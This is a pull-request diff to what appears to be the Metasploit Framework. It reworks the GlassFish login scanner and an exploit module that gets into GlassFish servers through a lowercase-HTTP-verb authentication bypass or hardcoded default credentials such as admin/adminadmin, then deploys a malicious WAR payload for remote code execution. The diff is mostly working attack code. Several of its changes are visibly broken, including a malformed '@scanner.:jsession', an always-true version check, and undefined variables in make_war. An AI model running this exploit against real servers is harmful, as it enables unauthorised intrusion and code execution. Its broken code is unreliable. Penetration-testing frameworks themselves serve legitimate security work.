### PR TITLE
GlassFish fixes (exploit & loginscanner)

### DIFF
--- a/lib/metasploit/framework/login_scanner/glassfish.rb
+++ b/lib/metasploit/framework/login_scanner/glassfish.rb
@@ -145,19 +145,9 @@ module Metasploit
         #   * :proof [String] the HTTP response body
         def try_glassfish_9(credential)
           res = try_login(credential)
-          if res && res.code == 302
-            opts = {
-              'uri'     => '/applications/upload.jsf',
-              'method'  => 'GET',
-              'headers' => {
-                'Cookie'  => "JSESSIONID=#{self.jsession}"
-              }
-            }
 
-            res = send_request(opts)
-            if res && res.code.to_i == 302 && res.headers['Location'].to_s !~ /loginError\.jsf$/
-              return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body}
-            end
+          if res && res.code.to_i == 302 && res.headers['Location'].to_s !~ /loginError\.jsf$/
+            return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body}
           end
 
           {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.body}

--- a/lib/metasploit/framework/login_scanner/glassfish.rb
+++ b/lib/metasploit/framework/login_scanner/glassfish.rb
@@ -14,7 +14,7 @@ module Metasploit
 
         # @!attribute [r] version
         #   @return [String] Glassfish version
-        attr_reader :version
+        attr_accessor :version
 
         # @!attribute jsession
         #   @return [String] Cookie session

--- a/lib/metasploit/framework/login_scanner/glassfish.rb
+++ b/lib/metasploit/framework/login_scanner/glassfish.rb
@@ -220,7 +220,7 @@ module Metasploit
           Result.new(result_opts)
         end
 
-        #
+
         # Extract the target's glassfish version from the HTTP Server Sun Java System Application Server 9.1header
         # (ex: Sun Java System Application Server 9.x)
         #

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -659,6 +659,34 @@ class Metasploit3 < Msf::Exploit::Remote
     my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}"
   end
 
+
+  def report_cred(opts)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: 'glassfish',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      private_data: opts[:password],
+      origin_type: :service,
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      last_attempted_at: DateTime.now
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def try_normal_login(version)
     init_loginscanner
 
@@ -693,6 +721,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("Trying to login as #{cred.public}:#{cred.private}")
       result = @scanner.attempt_login(cred)
       if result.status == Metasploit::Model::Login::Status::SUCCESSFUL
+        report_cred(user: cred.public, password: cred.private)
         return @scanner.jsession
       end
     end

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -13,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
+  include Msf::Auxiliary::Report
 
   def initialize(info={})
     super(update_info(info,
@@ -270,19 +271,28 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
+  def report_glassfish_version(banner)
+    report_note(
+      host: rhost,
+      type: 'glassfish.banner',
+      data: banner,
+      update: :unique_data
+    )
+  end
+
   #
   # Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
   # banner (ex: Sun Java System Application Server 9.x)
   #
   def get_version(res)
-    #Extract banner from response
+    # Extract banner from response
     banner = res.headers['Server']
 
-    #Default value for edition and glassfish version
+    # Default value for edition and glassfish version
     edition = 'Commercial'
     version = 'Unknown'
 
-    #Set edition (Open Source or Commercial)
+    # Set edition (Open Source or Commercial)
     p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
     edition = 'Open Source' if banner =~ p
 
@@ -300,6 +310,8 @@ class Metasploit3 < Msf::Exploit::Remote
     if version == nil || version == 'Unknown'
       print_status("Unsupported version: #{banner}")
     end
+
+    report_glassfish_version(banner)
 
     return edition, version, banner
   end
@@ -632,6 +644,18 @@ class Metasploit3 < Msf::Exploit::Remote
     )
   end
 
+  def report_auth_bypass(version)
+    report_vuln(
+      name: 'GlassFish HTTP Method Authentication Bypass',
+      info: "The remote service has a vulnerable version of GlassFish (#{version}) that allows the " \
+            'attacker to bypass authentication by sending an HTTP verb in lower-case.',
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      refs: self.references
+    )
+  end
+
   def try_glassfish_auth_bypass(version)
     sid = nil
 
@@ -651,6 +675,8 @@ class Metasploit3 < Msf::Exploit::Remote
         sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
       end
     end
+
+    report_auth_bypass(version) if sid
 
     sid
   end

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'nokogiri'
 require 'metasploit/framework/login_scanner/glassfish'
 require 'metasploit/framework/credential_collection'
 
@@ -17,33 +18,30 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Sun/Oracle GlassFish Server Authenticated Code Execution",
       'Description'    => %q{
-          This module logs in to an GlassFish Server 3.1 (Open Source or Commercial)
-        instance using a default credential, uploads, and executes commands via deploying
-        a malicious WAR.  On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x
-        this module will try to bypass authentication instead by sending lowercase HTTP verbs.
+          This module logs in to an GlassFish Server (Open Source or Commercial) using various
+        methods (such as authentication bypass, default credentials, or user-supplied login),
+        and deploys a malicious war file in order to get remote code execution. It has been
+        tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          # Msf module for Glassfish 3.0
-          'juan vazquez',
-          # Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
-          'Joshua Abraham <jabra[at]rapid7.com>',
-          # Rewrite for 3.0, 3.1 (Commercial or Open Source)
-          'sinn3r',
+          'juan vazquez', # Msf module for Glassfish 3.0
+          'Joshua Abraham <jabra[at]rapid7.com>', # Glassfish 3.1, 2.x & Sun Java System Application Server 9.1
+          'sinn3r' # Rewrite for everything
         ],
       'References'     =>
         [
           ['CVE', '2011-0807'],
-          ['OSVDB', '71948'],
+          ['OSVDB', '71948']
         ],
-      'Platform'       => 'win',
+      'Platform'       => ['win', 'linux', 'java'],
       'Targets'        =>
         [
           [ 'Automatic', { } ],
           [ 'Java Universal',    { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
           [ 'Windows Universal', { 'Arch' => ARCH_X86,  'Platform' => 'win' } ],
-          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ],
+          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ]
         ],
       'DisclosureDate' => "Aug 4 2011",
       'DefaultTarget'  => 0))
@@ -211,9 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote
         return nil
       end
 
-      input_id = "javax.faces.ViewState"
-      p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(.*)" autocomplete="off"/
-      viewstate = res.body.scan(p)[0][0]
+      viewstate = get_viewstate(res.body)
 
       entry = nil
       p = /<a id="(.*)col1:link" href="\/common\/applications\/applicationEdit.jsf.*appName=(.*)">/
@@ -287,8 +283,8 @@ class Metasploit3 < Msf::Exploit::Remote
     p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
     edition = 'Open Source' if banner =~ p
 
-    #Set version.  Some GlassFish servers return banner "GlassFish v3".
-    if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
+    # Set version.  Some GlassFish servers return banner "GlassFish v3".
+    if banner =~ /(GlassFish Server|Open Source Edition) {1,}(\d\.\d)/
       version = $2
     elsif banner =~ /GlassFish v(\d)/ && version == 'Unknown'
       version = $1
@@ -487,6 +483,22 @@ class Metasploit3 < Msf::Exploit::Remote
     return data
   end
 
+  def get_viewstate(body)
+    @vewstate ||= lambda {
+      noko = Nokogiri::HTML(body)
+      inputs = noko.search('input')
+      hidden_inputs = []
+      inputs.each {|e| hidden_inputs << e if e.attributes['type'].text == 'hidden'}
+      hidden_inputs.each do |e|
+        if e.attributes['name'].text == 'javax.faces.ViewState'
+          return e.attributes['value'].text
+        end
+      end
+
+      ''
+    }.call
+  end
+
   #
   # Upload our payload, and execute it.  This function will also try to automatically
   # clean up after itself.
@@ -503,40 +515,27 @@ class Metasploit3 < Msf::Exploit::Remote
       path = "/applications/upload.jsf?appType=webApp"
       res = send_glassfish_request(path, @verbs['GET'], session)
 
-      #Obtain some properties
-      begin
-        p1 = /id="javax\.faces\.ViewState" value="(j_id\d{1,5}:j_id\d{1,5})"/mi
-        p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
-        viewstate       = res.body.scan(p1)[0][0]
-        status_checkbox = res.body.scan(p2)[0][0]
-        boundary        = rand_text_alphanumeric(28)
-      rescue
-        print_error("Unable to gather required data for file upload")
-        return
-      end
+      # Obtain some properties
+      p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
+      viewstate       = get_viewstate(res.body)
+      status_checkbox = res.body.scan(p2)[0][0]
+      boundary        = rand_text_alphanumeric(28)
     else
       path = "/common/applications/uploadFrame.jsf"
       res = send_glassfish_request(path, @verbs['GET'], session)
 
-      #Obtain some properties
-      begin
-        #start is only for dynamic arguments in POST data
-        res.body =~ /propertySheetSection(\d{3})/
-        start = $1
-        p1 = /"javax\.faces\.ViewState" value="(-?\d+:-?\d+)"/mi
-        p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
-        p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/
+      # Obtain some properties
+      res.body =~ /propertySheetSection(\d{3})/
+      start = $1
+      p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
+      p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/
 
-        rnd_text = rand_text_alphanumeric(29)
+      rnd_text = rand_text_alphanumeric(29)
 
-        viewstate       = res.body.scan(p1)[0][0]
-        typefield       = res.body.scan(p2)[0][0]
-        status_checkbox = res.body.scan(p3)[0][0]
-        boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
-      rescue
-        print_error("Unable to gather required data for file upload")
-        return
-      end
+      viewstate       = get_viewstate(res.body)
+      typefield       = res.body.scan(p2)[0][0]
+      status_checkbox = res.body.scan(p3)[0][0]
+      boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
     end
 
     # Get upload data
@@ -604,7 +603,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # Sleep for a bit before cleanup
     select(nil, nil, nil, 5)
 
-    #Start undeploying
+    # Start undeploying
     print_status("Getting information to undeploy...")
     viewstate, entry = get_delete_info(session, version, app_base)
     if !viewstate
@@ -746,7 +745,7 @@ class Metasploit3 < Msf::Exploit::Remote
     sid = attempt_login(version)
 
     unless sid
-      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
+      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate")
     end
 
     selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -4,6 +4,8 @@
 ##
 
 require 'msf/core'
+require 'metasploit/framework/login_scanner/glassfish'
+require 'metasploit/framework/credential_collection'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -23,11 +25,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          #Msf module for Glassfish 3.0
+          # Msf module for Glassfish 3.0
           'juan vazquez',
-          #Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
+          # Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
           'Joshua Abraham <jabra[at]rapid7.com>',
-          #Rewrite for 3.0, 3.1 (Commercial or Open Source)
+          # Rewrite for 3.0, 3.1 (Commercial or Open Source)
           'sinn3r',
         ],
       'References'     =>
@@ -39,33 +41,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        =>
         [
           [ 'Automatic', { } ],
-          [
-            'Java Universal',
-            {
-              'Arch'     => ARCH_JAVA,
-              'Platform' => 'java',
-            },
-          ],
-          #
-          # platform specific targets only
-          #
-          [
-            'Windows Universal',
-            {
-              'Arch'     => ARCH_X86,
-              'Platform' => 'win',
-            },
-          ],
-          #
-          # platform specific targets only
-          #
-          [
-            'Linux Universal',
-            {
-              'Arch'     => ARCH_X86,
-              'Platform' => 'linux',
-            },
-          ],
+          [ 'Java Universal',    { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
+          [ 'Windows Universal', { 'Arch' => ARCH_X86,  'Platform' => 'win' } ],
+          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ],
         ],
       'DisclosureDate' => "Aug 4 2011",
       'DefaultTarget'  => 0))
@@ -83,20 +61,23 @@ class Metasploit3 < Msf::Exploit::Remote
   #
   # Send GET or POST request, and return the response
   #
-  def send_request(path, method, session='', data=nil, ctype=nil)
-
+  def send_glassfish_request(path, method, session='', data=nil, ctype=nil)
     headers = {}
-    headers['Cookie'] = "JSESSIONID=#{session}" if session != ''
-    headers['Content-Type'] = ctype if ctype != nil
+    headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
+    headers['Content-Type'] = ctype if ctype
 
     res = send_request_raw({
       'uri'     => path,
       'method'  => method,
       'data'    => data,
       'headers' => headers,
-    }, 90)
+    })
 
-    return res
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    res
   end
 
   #
@@ -106,22 +87,22 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Attempting to automatically select a target...")
 
     res = query_serverinfo(session,version)
-    return nil if not res
-    return nil if not res.body
+    return nil unless res
+    return nil unless res.body
 
     plat = detect_platform(res.body)
     arch = detect_arch(res.body)
 
     # No arch or platform found?
-    return nil if (not arch or not plat)
+    return nil if !arch || !plat
 
     # see if we have a match
     targets.each do |t|
-      return t if (t['Platform'] == plat) and (t['Arch'] == arch)
+      return t if (t['Platform'] == plat) && (t['Arch'] == arch)
     end
 
     # no matching target found
-    return nil
+    nil
   end
 
   #
@@ -172,36 +153,36 @@ class Metasploit3 < Msf::Exploit::Remote
   def query_serverinfo(session,version)
     res = ''
 
-    if version == '2.x' or version == '9.x'
+    if version == '2.x' || version == '9.x'
       path = "/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report"
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
     else
       path = "/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report"
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
-      if ((not res) or (res.code != 200) or (res.body !~ /Operating System Information/))
+      if !res || res.code != 200 || res.body.to_s !~ /Operating System Information/
         path = "/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server"
-        res = send_request(path, @verbs['GET'], session)
+        res = send_glassfish_request(path, @verbs['GET'], session)
       end
     end
 
-    if (not res) or (res.code != 200)
+    if !res || res.code != 200
       print_error("Failed: Error requesting #{path}")
       return nil
     end
 
-    return res
+    res
   end
 
   #
   # Return viewstate and entry before deleting a GlassFish application
   #
   def get_delete_info(session, version, app='')
-    if version == '2.x' or version == '9.x'
+    if version == '2.x' || version == '9.x'
       path = '/applications/webApplications.jsf'
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
-      if (not res) or (res.code != 200)
+      if !res || res.code != 200
         print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
         return nil
       end
@@ -223,9 +204,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     else
       path = '/common/applications/applications.jsf?bare=true'
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
-      if (not res) or (res.code != 200)
+      if !res || res.code != 200
         print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
         return nil
       end
@@ -246,10 +227,10 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    if (viewstate.nil?)
+    if !viewstate
       print_error("Failed: Error getting ViewState")
       return nil
-    elsif (entry.nil?)
+    elsif !entry
       print_error("Failed: Error getting the entry to delete")
     end
 
@@ -280,11 +261,11 @@ class Metasploit3 < Msf::Exploit::Remote
     path  = '/common/applications/applications.jsf'
     ctype = 'application/x-www-form-urlencoded'
 
-    res   = send_request(path, @verbs['POST'], session, data, ctype)
-    if (not res)
+    res   = send_glassfish_request(path, @verbs['POST'], session, data, ctype)
+    if !res
       print_error("Undeployment failed on #{path} - No Response")
     else
-      if res.code < 200 or res.code >= 300
+      if res.code < 200 || res.code >= 300
         print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}")
       end
     end
@@ -309,15 +290,15 @@ class Metasploit3 < Msf::Exploit::Remote
     #Set version.  Some GlassFish servers return banner "GlassFish v3".
     if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
       version = $2
-    elsif banner =~ /GlassFish v(\d)/ and version == 'Unknown'
+    elsif banner =~ /GlassFish v(\d)/ && version == 'Unknown'
       version = $1
-    elsif banner =~ /Sun GlassFish Enterprise Server v2/ and version == 'Unknown'
+    elsif banner =~ /Sun GlassFish Enterprise Server v2/ && version == 'Unknown'
       version = '2.x'
-    elsif banner =~ /Sun Java System Application Server 9/ and version == 'Unknown'
+    elsif banner =~ /Sun Java System Application Server 9/ && version == 'Unknown'
       version = '9.x'
     end
 
-    if version == nil or version == 'Unknown'
+    if version == nil || version == 'Unknown'
       print_status("Unsupported version: #{banner}")
     end
 
@@ -399,7 +380,7 @@ class Metasploit3 < Msf::Exploit::Remote
         format(boundary, "javax.faces.ViewState", viewstate),
         "#{boundary}--"
       ].join()
-    elsif version == '2.x' or version == '9.x'
+    elsif version == '2.x' || version == '9.x'
 
       uploadParam_name = "form:title:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
       uploadParam_data = "form:title:sheet1:section1:prop1:fileupload"
@@ -518,9 +499,9 @@ class Metasploit3 < Msf::Exploit::Remote
     edition = opts[:edition]
     version = opts[:version]
 
-    if version == '2.x' or version == '9.x'
+    if version == '2.x' || version == '9.x'
       path = "/applications/upload.jsf?appType=webApp"
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
       #Obtain some properties
       begin
@@ -535,7 +516,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     else
       path = "/common/applications/uploadFrame.jsf"
-      res = send_request(path, @verbs['GET'], session)
+      res = send_glassfish_request(path, @verbs['GET'], session)
 
       #Obtain some properties
       begin
@@ -558,10 +539,10 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    #Get upload data
+    # Get upload data
     if version == '3.0'
       ctype = "multipart/form-data; boundary=#{boundary}"
-    elsif version == '2.x' or version == '9.x'
+    elsif version == '2.x' || version == '9.x'
       ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
       typefield = ''
       start = ''
@@ -580,18 +561,19 @@ class Metasploit3 < Msf::Exploit::Remote
       :viewstate => viewstate
     })
 
-    #Upload our payload
-    if version == '2.x' or version == '9.x'
+    # Upload our payload
+    if version == '2.x' || version == '9.x'
       path = '/applications/upload.jsf?form:title:topButtons:uploadButton=%20%20OK%20%20'
     else
       path  = '/common/applications/uploadFrame.jsf?'
       path << 'form:title:topButtons:uploadButton=Processing...'
       path << '&bare=false'
     end
-    res  = send_request(path, @verbs['POST'], session, post_data, ctype)
 
-    #Print upload result
-    if res and res.code == 302
+    res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype)
+
+    # Print upload result
+    if res.code == 302
       print_status("Successfully uploaded")
     else
       print_error("Error uploading #{res.code}")
@@ -613,7 +595,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'  => 'GET',
     })
 
-    if (req)
+    if req
       res = nclient.send_recv(req, 90)
     else
       print_status("Error: #{rhost} did not respond on #{app_rport}.")
@@ -625,7 +607,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #Start undeploying
     print_status("Getting information to undeploy...")
     viewstate, entry = get_delete_info(session, version, app_base)
-    if (not viewstate)
+    if !viewstate
       fail_with(Failure::Unknown, "Unable to get viewstate")
     elsif (not entry)
       fail_with(Failure::Unknown, "Unable to get entry")
@@ -637,230 +619,135 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Undeployment complete.")
   end
 
-  #
-  # Try to login to Glassfish with a credential, and return the response
-  #
-  def try_login(user, pass)
-    data  = "j_username=#{Rex::Text.uri_encode(user.to_s)}&"
-    data << "j_password=#{Rex::Text.uri_encode(pass.to_s)}&"
-    data << "loginButton=Login"
+  def init_loginscanner(creds)
+    @cred_collection = Metasploit::Framework::CredentialCollection.new(
+      userpass_file: creds * "\n"
+    )
 
-    path = '/j_security_check'
-    res = send_request(path, @verbs['POST'], '', data, 'application/x-www-form-urlencoded')
-
-    return res
+    @scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
+      configure_http_login_scanner(
+        cred_details: @cred_collection,
+        connection_timeout: 5
+      )
+    )
   end
-
-  def log_success(user = "", pass = "")
-    service_data = {
-      address: Rex::Socket.getaddress(rhost, true),
-      port: rport,
-      protocol: "tcp",
-      service_name: ssl ? "https" : "http",
-      workspace_id: myworkspace_id
-    }
-
-    credential_data = {
-      origin_type: :service,
-      module_fullname: self.fullname,
-      username: user,
-      private_data: pass,
-      private_type: :password
-    }
-
-    credential_core = create_credential(credential_data.merge(service_data))
-
-    login_data = {
-      core: credential_core,
-      access_level: "Admin",
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
-      last_attempted_at: DateTime.now
-    }
-
-    create_credential_login(login_data.merge(service_data))
-  end
-
-  def try_default_glassfish_login(version)
-    if version == '2.x' or version == '9.x'
-      user = 'admin'
-      pass = 'adminadmin'
-    else
-      user = 'admin'
-      pass = ''
-    end
-
-    return try_glassfish_login(version,user,pass)
-  end
-
-  def try_glassfish_login(version,user,pass,type='default')
-    success = false
-    session = ''
-    res = ''
-    if version == '2.x' or version == '9.x'
-      print_status("Trying #{type} credentials for GlassFish 2.x #{user}:'#{pass}'....")
-      res = try_login(user,pass)
-      if res and res.code == 302
-        session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i
-        res = send_request('/applications/upload.jsf', 'GET', session)
-
-        p = /<title>Deploy Enterprise Applications\/Modules/
-        if (res and res.code.to_i == 200 and res.body.match(p) != nil)
-          success = true
-        end
-      end
-
-    else
-      print_status("Trying #{type} credentials for GlassFish 3.x #{user}:'#{pass}'....")
-      res = try_login(user,pass)
-      if res and res.code == 302
-        session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i
-        res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)
-
-        p = /<title>Deploy Applications or Modules/
-        if (res and res.code.to_i == 200 and res.body.match(p) != nil)
-          success = true
-        end
-      end
-    end
-
-    if success == true
-      print_good("#{my_target_host()} - GlassFish - SUCCESSFUL login for '#{user}' : '#{pass}'")
-      log_success(user,pass)
-    else
-      msg = "#{my_target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
-      print_error(msg)
-    end
-
-    return success, res, session
-  end
-
 
   def try_glassfish_auth_bypass(version)
-    print_status("Trying GlassFish authentication bypass..")
-    success = false
+    sid = false
 
-    if version == '2.x' or version == '9.x'
-      res = send_request('/applications/upload.jsf', 'get')
+    if version == '2.x' || version == '9.x'
+      res = send_glassfish_request('/applications/upload.jsf', 'get')
       p = /<title>Deploy Enterprise Applications\/Modules/
-      if (res and res.code.to_i == 200 and res.body.match(p) != nil)
-        success = true
+      if res && res.code.to_i == 200 && res.body.match(p) != nil
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
       end
     else
       # 3.0
-      res = send_request('/common/applications/uploadFrame.jsf', 'get')
+      res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
       p = /<title>Deploy Applications or Modules/
-      if (res and res.code.to_i == 200 and res.body.match(p) != nil)
-        success = true
+      if res && res.code.to_i == 200 && res.body.match(p) != nil
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
       end
     end
 
-    if success == true
-      print_good("#{my_target_host} - GlassFish - SUCCESSFUL authentication bypass")
-      log_success
-    else
-      print_error("#{my_target_host()} - GlassFish - Failed authentication bypass")
-    end
-
-    return success
+    sid
   end
 
   def my_target_host
-    path        = normalize_uri(datastore['PATH'])
+    path = normalize_uri(datastore['PATH'])
     my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
   end
 
-  def exploit
-    user        = datastore['USERNAME']
-    pass        = datastore['PASSWORD']
-    path        = datastore['PATH']
-    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
-    success     = false
-    session     = ''
-    edition     = ''
-    version     = ''
-
-    #Invoke index to gather some info
-    res = send_request('/common/index.jsf', 'GET')
-
-    #If we get a bad connection, we'd rather not try
-    if res.nil?
-      print_error("Unable to get a response from the server")
-      return
+  def try_normal_login(version)
+    case version
+    when /2\.x|9\.x/
+      creds = ['admin adminadmin']
+    when /^3\./
+      creds = ['admin']
+    else
+      creds = []
     end
 
-    if res.code == 302
-      res = send_request('/login.jsf', 'GET')
-    end
+    creds << "#{datastore['USERNAME']} #{datastore['PASSWORD']}"
 
-    #Get GlassFish version
-    edition, version, banner = get_version(res)
-    print_status("Glassfish edition: #{banner}")
+    init_loginscanner(creds)
 
-    #Get session
-    res.get_cookies =~ /JSESSIONID=(.*); /
-    session = $1
-
-    #Set HTTP verbs.  lower-case is used to bypass auth on v3.0
-    @verbs = {
-      'GET'  => (version == '3.0' or version == '2.x' or version == '9.x') ? "get" : 'GET',
-      'POST' => (version == '3.0' or version == '2.x' or version == '9.x') ? 'post' : 'POST',
-    }
-
-    #auth bypass
-    if version == '3.0' or version == '2.x' or version == '9.x'
-      success = try_glassfish_auth_bypass(version)
-    end
-
-    #BUG caused us to skip default cred checks on sun applicaiton server 9.x
-    if success == false and version != '9.x'
-      #default credentials
-      success,res,session_login = try_default_glassfish_login(version)
-
-      if success == false
-        if (
-          ( (version == '2.x' ) and (user != 'admin' or pass != 'adminadmin') )  or
-          ( (version =~ /^3\./) and (user != 'admin' or pass != '') )
-        )
-          #non-default login
-          success,res,session_login = try_glassfish_login(version,user,pass,'non-default')
-        end
+    @scanner.version = version
+    @cred_collection.each do |raw|
+      cred = raw.to_credential
+      result = @scanner.attempt_login(cred)
+      if result == Metasploit::Model::Login::Status::SUCCESSFUL
+        return @scanner.:jsession
       end
     end
 
-    #Start attacking
-    if success
-      session = session_login if (session_login =~ /\w+/)
-      #Set target
-      mytarget = target
-      mytarget = auto_target(session, res, version) if mytarget.name =~ /Automatic/
-      fail_with(Failure::NoTarget, "Unable to automatically select a target") if (not mytarget)
+    nil
+  end
 
-      #Generate payload
-      p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
+  def attempt_login(version)
+    sid = nil
 
-      jsp_name = rand_text_alphanumeric(4+rand(32-4))
-      app_base = rand_text_alphanumeric(4+rand(32-4))
-
-      war = p.encoded_war({
-        :app_name    => app_base,
-        :jsp_name    => jsp_name,
-        :arch        => mytarget.arch,
-        :platform    => mytarget.platform
-      }).to_s
-
-      #Upload, execute, cleanup, winning
-      print_status("Uploading payload...")
-      res = upload_exec({
-        :session => session,
-        :app_base => app_base,
-        :jsp_name => jsp_name,
-        :war => war,
-        :edition => edition,
-        :version => version
-      })
-    else
-      print_error("#{my_target_host()} - GlassFish - Failed to authenticate login")
+    if version =~ /3\.0|2\.x|9\.x/
+      sid = try_glassfish_auth_bypass(version)
+      return sid if sid
     end
 
+    try_normal_login(version, user, pass, 'non-default')
+  end
+
+  def make_war
+    my_target = auto_target(sid, res, version) if target.name =~ /Automatic/
+    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless mytarget
+
+    # Generate payload
+    p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
+
+    jsp_name = rand_text_alphanumeric(4+rand(32-4))
+    app_base = rand_text_alphanumeric(4+rand(32-4))
+
+    war = p.encoded_war({
+      :app_name    => app_base,
+      :jsp_name    => jsp_name,
+      :arch        => mytarget.arch,
+      :platform    => mytarget.platform
+    }).to_s
+
+    return app_base, jsp_name, war
+  end
+
+  def exploit
+    # Invoke index to gather some info
+    res = send_glassfish_request('/common/index.jsf', 'GET')
+
+    if res.code == 302
+      res = send_glassfish_request('/login.jsf', 'GET')
+    end
+
+    # Get GlassFish version
+    edition, version, banner = get_version(res)
+    print_status("Glassfish edition: #{banner}")
+
+    # Set HTTP verbs. Lower-case is used to bypass auth on v3.0
+    @verbs = {
+      'GET'  => (version == '3.0' || version == '2.x' || version || '9.x') ? "get" : 'GET',
+      'POST' => (version == '3.0' || version == '2.x' || version || '9.x') ? 'post' : 'POST',
+    }
+
+    sid = attempt_login(version)
+
+    unless sid
+      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
+    end
+
+    app_base, jsp_name, war = make_war
